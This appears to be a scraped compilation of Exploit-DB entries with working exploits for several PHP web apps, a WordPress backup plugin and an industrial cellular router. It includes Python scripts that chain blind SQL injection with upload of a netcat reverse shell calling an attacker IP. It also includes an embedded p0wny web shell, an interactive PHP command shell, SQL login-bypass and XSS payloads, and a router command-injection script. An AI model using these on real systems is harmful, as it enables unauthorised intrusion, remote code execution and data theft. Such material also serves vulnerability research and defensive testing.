ISHACK AI BOT

# Exploit Title: Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE) # Exploit Author: Geiseric # Original Exploit Author: deathflash1411 - https://www.exploit-db.com/exploits/50076 - https://www.exploit-db.com/exploits/50075 # Date 02.07.2021 # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/php/4808/voting-system-php.html # Version 1.0 # Tested on: Ubuntu 20.04 import requests import os import sys from requests_toolbelt.multipart.encoder import MultipartEncoder import string import random if len(sys.argv) < 4: print('[+] Usage: python3 ovsploit.py http://<ip> <your ip> <your port>') exit() url = sys.argv[1] attacker_ip = sys.argv[2] attacker_port = sys.argv[3] exp_url = '/Online_voting_system/admin/save_candidate.php' login_url = '/Online_voting_system/admin/' def first_get(): r = requests.get(url+login_url) return r.headers['Set-Cookie'] def retrieve_first_admin(): print("[!] Stage 1: Finding a valid admin user through SQL Injection") cookie = first_get() count = 0 i=1 flag = True admin = '' while flag: for j in range(32,128): r = requests.post(url+login_url,data={'UserName': """aasd' AND (SELECT 7303 FROM (SELECT(SLEEP(1-(IF(ORD(MID((SELECT IFNULL(CAST(UserName AS NCHAR),0x20) FROM users WHERE User_Type = "admin" LIMIT 0,1),"""+str(i)+""",1))="""+str(j)+""",0,1)))))PwbW)-- qRBs""",'Password': 'asd','Login':''},headers={"Cookie":cookie}) if (r.elapsed.total_seconds() > 1): admin += chr(j) i+=1 sys.stdout.write("\rAdmin User: "+ admin) sys.stdout.flush() count=0 else: if count == 100: flag = False break else: count += 1 print("\n[+] First admin user found!") print("[!] Starting Stage 2") return admin def id_generator(size=6, chars=string.ascii_lowercase): return ''.join(random.choice(chars) for _ in range(size))+'.php' def login_bypass(cookie): username = retrieve_first_admin() print("[!] Stage 2 started: Bypassing Login...") r = requests.post(url+login_url,data={'UserName': username,'Password': "' or ''='",'Login':''}, headers={'Cookie':cookie}) return cookie def rev_write(): name = id_generator() f = open(name,'w') f.write('<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ' +attacker_ip+ " " + attacker_port+' >/tmp/f"); ?>') f.close() print('[+] Generated file with reverse shell: ' +name) return name def exploit(cookie): print("[+] Uploading reverse shell...") filename=rev_write() multipart_data = MultipartEncoder( { # a file upload field 'image': (filename, open(filename, 'rb'), 'application/x-php'), # plain text fields 'user_name': 'admin', 'rfirstname': 'test', 'rlastname': 'test', 'rgender': 'Male', 'ryear': '1st year', 'rmname': 'test', 'rposition': 'Governor', 'party': 'test', 'save': 'save' } ) r = requests.post(url+exp_url, data=multipart_data, headers={'Content-Type': multipart_data.content_type, 'Cookie':cookie}) return filename filename = exploit(login_bypass(first_get())) print("[!] Triggering...") input('[+] Please start a listener on port ' + attacker_port +' then press Enter to get shell.') os.system('curl '+url+'/Online_voting_system/admin/upload/'+filename+' -m 1 -s') print("[+] Cleaning up!") os.system("rm "+ filename)

# Exploit Title: Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 03 July 2021 # Exploit Author: Subhadip Nag # Author Linkedin: www.linkedin.com/in/subhadip-nag-09/ # Vendor Homepage: https://phpgurukul.com # Software Link: https://phpgurukul.com/client-management-system-using-php-mysql/ # Version: 1.1 # Tested on: Server: XAMPP # Description # Online Birth Certificate System 1.1 is vulnerable to stored cross site scripting (xss) in the registration form because of insufficient user supplied data. # Proof of Concept (PoC) : Exploit # 1) Goto: http://localhost/OBCS/obcs/user/register.php 2) In the first name field, enter the payload: <script>alert(1)</script> 3) Click Register 4) Goto: http://localhost/OBCS/obcs/user/login.php 5) Enter your mobile number, password & click login 6) our XSS attack successfull # PoC image 1) https://ibb.co/7C6g6nK

# Exploit Title: Church Management System 1.0 - Unrestricted File Upload to Remote Code Execution (Authenticated) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # CVE : N/A # Proof of Concept : 1- Login any user account and change profile picture. 2- Upload any php shell by altering it's extension to .jpg or .png. (i.e test.php.jpg) 3- Before uploading your file, intercept your traffic by using any proxy. 4- Change test.php.jpg file to test.php and click forward. 5- Find your test.php file path and try any command. ###################### REQUEST ########################################## GET /cman/members/uploads/test.php?cmd=SYSTEMINFO HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: image/webp,*/* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://localhost/cman/members/dashboard.php Cookie: PHPSESSID=cne8l4ct93krjqobdus7nv2sjc ####################### RESPONSE ######################################### HTTP/1.1 200 OK Date: Sat, 03 Jul 2021 11:28:16 GMT Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3 X-Powered-By: PHP/8.0.3 Content-Length: 4410 Connection: close Content-Type: text/html; charset=UTF-8 Host Name: MRT OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19043 N/A Build 19043 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: Murat System Boot Time: 6/25/2021, 2:51:40 PM System Manufacturer: Dell Inc. System Type: x64-based PC Processor(s): 1 Processor(s) Installed. ############################################################################

# Exploit Title: Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # Proof of Concept : #Payload: <img src=x onerror=alert(1)> #Injectable parameters : amount= and trcode= ###################### REQUEST ########################################## POST /cman/members/Tithes.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 85 Origin: http://localhost Connection: close Referer: http://localhost/cman/members/Tithes.php Cookie: PHPSESSID=cne2l4cs96krjqpbpus7nv2sjc Upgrade-Insecure-Requests: 1 amount=<img+src%3dx+onerror%3dalert(1)>&trcode=<img+src%3dx+onerror%3dalert(1)>&save=

# Exploit Title: Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated) # Date 02.07.2021 # Exploit Author: Ron Jost (Hacker5preme) # Vendor Homepage: https://backup-guard.com/products/backup-wordpress # Software Link: https://downloads.wordpress.org/plugin/backup.1.5.8.zip # Version: Before 1.6.0 # Tested on: Ubuntu 18.04 # CVE: CVE-2021-24155 # CWE: CWE-434 # Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24155/README.md ''' Description: The plugin did not ensure that the imported files are of the SGBP format and extension, allowing high privilege users (admin+) to upload arbitrary files, including PHP ones, leading to RCE. Additional Info, and Bypass of .htaccess protection found by WPScanTeam, while confirming the issue: There is a protection in place against accessing the uploaded files, via a .htaccess in the wp-content/uploads/backup-guard/ folder, however: - Some web servers do not support .htaccess, e.g Nginx, making it useless in such case - Arbitrary content can be appended to the existing .htaccess, to make the deny from all invalid, and bypass the protection on web servers such as Apache Note: v1.6.0 forced the uploaded file to have the .sgbp extension by adding it if not present, but the file content is not verified, which could still allow chaining with an issue such as LFI or Arbitrary File Renaming to achieve RCE ''' ''' Banner: ''' banner = """ ______ _______ ____ ___ ____ _ ____ _ _ _ ____ ____ / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | ___| ___| | | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| |___ \___ \ | |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |___) |__) | \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_|____/____/ * Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated) * @Hacker5preme """ print(banner) ''' Import required modules: ''' import requests import argparse ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Wordpress Plugin Backup Guard < 1.6.0 - RCE (Authenticated)') my_parser.add_argument('-T', '--IP', type=str) my_parser.add_argument('-P', '--PORT', type=str) my_parser.add_argument('-U', '--PATH', type=str) my_parser.add_argument('-u', '--USERNAME', type=str) my_parser.add_argument('-p', '--PASSWORD', type=str) args = my_parser.parse_args() target_ip = args.IP target_port = args.PORT wp_path = args.PATH username = args.USERNAME password = args.PASSWORD print('') ''' Authentication: ''' session = requests.Session() auth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' # Header: header = { 'Host': target_ip, 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Origin': 'http://' + target_ip, 'Connection': 'close', 'Upgrade-Insecure-Requests': '1' } # Body: body = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'testcookie': '1' } # Authenticate: print('') auth = session.post(auth_url, headers=header, data=body) auth_header = auth.headers['Set-Cookie'] if 'wordpress_logged_in' in auth_header: print('[+] Authentication successfull !') else: print('[-] Authentication failed !') exit() ''' Retrieve Token for backup: ''' token_url = "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/admin.php?page=backup_guard_backups' # Header (Token): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://" + target_ip + ':' + target_port + wp_path + '/wp-admin/users.php', "Connection": "close", "Upgrade-Insecure-Requests": "1" } # Get Token: print('') print('[+] Grabbing unique Backup Plugin Wordpress Token:') token_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups' init_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/index.php' init_request = session.get(init_url).text token_request = session.get(token_url).text token_start_in = token_request.find('&token=') token_start_in = token_request[token_start_in + 7:] token = token_start_in[:token_start_in.find('"')] print(' -> Token: ' + token) ''' Exploit: ''' print('') print('[*] Starting Exploit:') exploit_url = "http://" + target_ip + ':' + target_port + wp_path + 'wp-admin/admin-ajax.php?action=backup_guard_importBackup&token=' + token # Header (Exploit): header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": 'http://' + target_ip + ':' + target_port + wp_path + 'wp-admin/admin.php?page=backup_guard_backups', "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------17366980624047956771255332862", "Origin": 'http://' + target_ip, "Connection": "close" } # Body (Exploit): Using p0wny shell: https://github.com/flozz/p0wny-shell body = "-----------------------------17366980624047956771255332862\r\nContent-Disposition: form-data; name=\"files[]\"; filename=\"shell.php\"\r\nContent-Type: image/png\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------17366980624047956771255332862--\r\n" session.post(exploit_url, headers=header, data=body) print('[+] Exploit done !') print(' -> Webshell uploaded to: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/backup-guard/shell.php') print('')

# Exploit Title: Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass) # Date: 07/03/2021 # Exploit Author: Murat DEMIRCI (@butterflyhunt3r) # Vendor Homepage: https://www.sourcecodester.com # Software Link: https://www.sourcecodester.com/php/11206/church-management-system.html # Version: 1.0 # Tested on: Windows 10 # Description : The admin login of this app is vulnerable to sql injection login bypass. Anyone can bypass admin login authentication. # Proof of Concept : 1-Go to http://target.com/cman/admin 2-Write the following payload to username and admin parameter and click login. ######################## REQUEST ############################### POST /cman/admin/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 51 Origin: http://localhost Connection: close Referer: http://localhost/cman/admin/index.php Cookie: PHPSESSID=cne5l4cs93krjqobput7nv7sjc Upgrade-Insecure-Requests: 1 username=test&password=%27+or+%27a%27%3D%27a&login= ################################################################ PAYLOAD: # username : test # password : ' or 'a'='a

# Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE) # Date: July 4, 2021 # Exploit Author: Ishan Saha # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip # Version: 1.0 # Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali #!/usr/bin/python # Description: # 1. This uses the SQL injection to bypass the admin login and create a new user # 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server # 3. the shell is called from the location import requests from colorama import Fore, Back, Style ''' Description: Using the sql injeciton to bypass the login and create a user. This user creates a client with the shell as an image and uploads the shell. The shell is called by the requests library for easier use. ------------------------------------------ Developed by - Ishan Saha & HackerCTF team (https://twitter.com/hackerctf) ------------------------------------------ ''' # Variables : change the URL according to need URL="http://192.168.0.248/client/" shellcode = "<?php system($_GET['cmd']);?>" filename = "shell.php" authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"} createuser = {"fname":"ishan","lname":"saha","email":"[email protected]","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"} userlogin={"uemail":"[email protected]","password":"Grow_with_hackerctf","login":"LOG IN"} shelldata={"fname":"a","lname":"l","uname":"l","email":"[email protected]","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"} def format_text(title,item): cr = '\r\n' section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr item=str(item) text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+ Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET return text ShellSession = requests.Session() response = ShellSession.get(URL) response = ShellSession.post(URL + "admin/index.php",data=authdata) response = ShellSession.post(URL + "admin/regester.php",data=createuser) response = ShellSession.post(URL,data=userlogin) response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")}) location = URL +"img/" + filename #print statements print(format_text("Target",URL),end='') print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='') print(format_text("shell location",location),end='') print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!")) while True: cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET) if cmd == 'exit': break print(ShellSession.get(location + "?cmd="+cmd).content.decode())

# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) # Date: 02.07.2021 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.riconmobile.com #!/usr/bin/env python3 # -*- coding: utf-8 -*- # # # Ricon Industrial Cellular Router S9922XL Remote Command Execution # # # Vendor: Ricon Mobile Inc. # Product web page: https://www.riconmobile.com # Affected version: Model: S9922XL and S9922L # Firmware: 16.10.3 # # Summary: S9922L series LTE router is designed and manufactured by # Ricon Mobile Inc., it based on 3G/LTE cellular network technology # with industrial class quality. With its embedded cellular module, # it widely used in multiple case like ATM connection, remote office # security connection, data collection, etc. # # The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi # and VPN technologies. Powerful 64-bit Processor and integrated real-time # operating system specially developed by Ricon Mobile. S9922XL is # widely used in many areas such as intelligent transportation, scada, # POS, industrial automation, telemetry, finance, environmental protection. # # Desc: The router suffers from an authenticated OS command injection # vulnerability. This can be exploited to inject and execute arbitrary # shell commands as the admin (root) user via the 'ping_server_ip' POST # parameter. Also vulnerable to Heartbleed. # # -------------------------------------------------------------------- # C:\>python ricon.py 192.168.1.71 id # uid=0(admin) gid=0(admin) # -------------------------------------------------------------------- # # Tested on: GNU/Linux 2.6.36 (mips) # WEB-ROUTER # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # @zeroscience # # # Advisory ID: ZSL-2021-5653 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php # # # 02.07.2021 # import requests,sys,re if len(sys.argv)<3: print("Ricon Industrial Routers RCE") print("Usage: ./ricon.py [ip] [cmd]") sys.exit(17) else: ipaddr=sys.argv[1] execmd=sys.argv[2] data={'submit_class' :'admin', 'submit_button' :'netTest', 'submit_type' :'', 'action' :'Apply', 'change_action' :'', 'is_ping' :'0', 'ping_server_ip':';'+execmd} htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin')) htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin')) reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n') print(reout)

